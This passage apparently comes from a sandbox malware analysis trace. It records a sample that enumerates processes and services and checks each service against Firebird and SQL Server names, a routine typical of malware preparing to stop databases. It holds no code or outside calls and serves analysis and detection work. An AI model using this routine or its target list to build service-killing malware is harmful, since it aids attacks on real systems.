lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0163.092] lstrlenW (lpString="hgaibc.exe") returned 10 [0163.092] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.093] lstrlenW (lpString="cmd.exe") returned 7 [0163.093] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.094] lstrlenW (lpString="conhost.exe") returned 11 [0163.094] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0163.095] lstrlenW (lpString="mode.com") returned 8 [0163.095] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0163.096] CloseHandle (hObject=0x50c) returned 1 [0163.096] Sleep (dwMilliseconds=0x1f4) [0163.851] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c358 [0163.852] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0163.852] GetLastError () returned 0xea [0163.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x4594008 [0163.853] EnumServicesStatusExW (in: hSCManager=0x458c358, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4594008, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4594008, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0163.853] CloseServiceHandle (hSCObject=0x458c358) returned 1 [0163.854] lstrlenW (lpString="Appinfo") returned 7 [0163.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0163.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0163.854] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0163.854] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0163.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0163.854] lstrlenW (lpString="AppXSvc") returned 7 [0163.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0163.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0163.854] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0163.854] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0163.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0163.854] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0163.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0163.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0163.854] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0163.854] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0163.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0163.854] lstrlenW (lpString="Audiosrv") returned 8 [0163.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0163.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0163.855] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0163.855] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0163.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0163.855] lstrlenW (lpString="BFE") returned 3 [0163.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0163.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0163.855] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0163.855] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0163.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0163.855] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0163.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0163.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0163.855] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0163.855] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0163.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0163.855] lstrlenW (lpString="CDPSvc") returned 6 [0163.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0163.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0163.855] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0163.855] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0163.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0163.855] lstrlenW (lpString="ClickToRunSvc") returned 13 [0163.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0163.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0163.856] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0163.856] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0163.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0163.856] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0163.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0163.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0163.856] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0163.856] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0163.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0163.856] lstrlenW (lpString="CryptSvc") returned 8 [0163.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0163.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0163.856] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0163.856] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0163.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0163.856] lstrlenW (lpString="DcomLaunch") returned 10 [0163.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0163.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0163.856] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0163.856] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0163.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0163.856] lstrlenW (lpString="DeviceAssociationService") returned 24 [0163.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0163.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0163.856] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0163.856] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0163.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0163.857] lstrlenW (lpString="Dhcp") returned 4 [0163.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0163.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0163.857] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0163.857] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0163.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0163.857] lstrlenW (lpString="Dnscache") returned 8 [0163.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0163.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0163.857] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0163.857] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0163.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0163.857] lstrlenW (lpString="DPS") returned 3 [0163.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0163.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0163.857] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0163.857] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0163.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0163.857] lstrlenW (lpString="DusmSvc") returned 7 [0163.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0163.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0163.857] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0163.857] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0163.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0163.857] lstrlenW (lpString="EventLog") returned 8 [0163.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0163.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0163.857] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0163.857] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0163.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0163.858] lstrlenW (lpString="EventSystem") returned 11 [0163.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0163.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0163.858] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0163.858] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0163.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0163.858] lstrlenW (lpString="FontCache") returned 9 [0163.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0163.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0163.858] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0163.858] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0163.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0163.858] lstrlenW (lpString="gpsvc") returned 5 [0163.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0163.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0163.858] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0163.858] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0163.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0163.858] lstrlenW (lpString="iphlpsvc") returned 8 [0163.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0163.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0163.858] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0163.858] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0163.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0163.858] lstrlenW (lpString="KeyIso") returned 6 [0163.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0163.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0163.859] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0163.859] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0163.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0163.859] lstrlenW (lpString="LanmanServer") returned 12 [0163.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0163.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0163.859] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0163.859] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0163.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0163.859] lstrlenW (lpString="LanmanWorkstation") returned 17 [0163.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0163.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0163.859] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0163.859] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0163.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0163.859] lstrlenW (lpString="lfsvc") returned 5 [0163.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0163.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0163.859] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0163.859] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0163.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0163.859] lstrlenW (lpString="lmhosts") returned 7 [0163.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0163.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0163.859] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0163.859] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0163.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0163.860] lstrlenW (lpString="LSM") returned 3 [0163.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0163.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0163.860] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0163.860] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0163.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0163.860] lstrlenW (lpString="MpsSvc") returned 6 [0163.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0163.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0163.860] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0163.860] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0163.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0163.860] lstrlenW (lpString="NcbService") returned 10 [0163.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0163.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0163.860] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0163.860] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0163.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0163.860] lstrlenW (lpString="netprofm") returned 8 [0163.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0163.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0163.860] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0163.860] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0163.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0163.860] lstrlenW (lpString="NgcSvc") returned 6 [0163.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0163.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0163.861] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0163.861] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0163.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0163.861] lstrlenW (lpString="NlaSvc") returned 6 [0163.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0163.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0163.861] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0163.861] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0163.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0163.861] lstrlenW (lpString="nsi") returned 3 [0163.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0163.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0163.861] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0163.861] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0163.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0163.861] lstrlenW (lpString="PcaSvc") returned 6 [0163.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0163.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0163.861] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0163.861] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0163.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0163.861] lstrlenW (lpString="PlugPlay") returned 8 [0163.861] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0163.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0163.861] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0163.861] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0163.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0163.861] lstrlenW (lpString="Power") returned 5 [0163.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0163.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0163.862] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0163.862] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0163.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0163.862] lstrlenW (lpString="ProfSvc") returned 7 [0163.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0163.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0163.862] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0163.862] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0163.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0163.862] lstrlenW (lpString="RpcEptMapper") returned 12 [0163.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0163.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0163.862] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0163.862] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0163.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0163.862] lstrlenW (lpString="RpcSs") returned 5 [0163.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0163.862] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0163.862] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0163.862] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0163.862] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0163.862] lstrlenW (lpString="SamSs") returned 5 [0163.862] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0163.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0163.863] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0163.863] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0163.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0163.863] lstrlenW (lpString="Schedule") returned 8 [0163.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0163.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0163.863] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0163.863] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0163.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0163.863] lstrlenW (lpString="SecurityHealthService") returned 21 [0163.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0163.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0163.863] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0163.863] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0163.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0163.863] lstrlenW (lpString="SENS") returned 4 [0163.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0163.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0163.863] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0163.863] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0163.863] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0163.863] lstrlenW (lpString="ShellHWDetection") returned 16 [0163.863] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0163.863] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0163.863] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0163.863] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0163.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0163.864] lstrlenW (lpString="Spooler") returned 7 [0163.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0163.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0163.864] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0163.864] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0163.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0163.864] lstrlenW (lpString="StateRepository") returned 15 [0163.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0163.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0163.864] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0163.864] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0163.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0163.864] lstrlenW (lpString="SysMain") returned 7 [0163.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0163.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0163.864] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0163.864] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0163.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0163.864] lstrlenW (lpString="SystemEventsBroker") returned 18 [0163.864] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0163.864] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0163.864] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0163.864] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0163.864] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0163.865] lstrlenW (lpString="Themes") returned 6 [0163.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0163.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0163.865] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0163.865] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0163.865] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0163.865] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0163.865] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0163.865] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0163.865] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0163.865] lstrcmpiW (lpString1="mssqlserver", 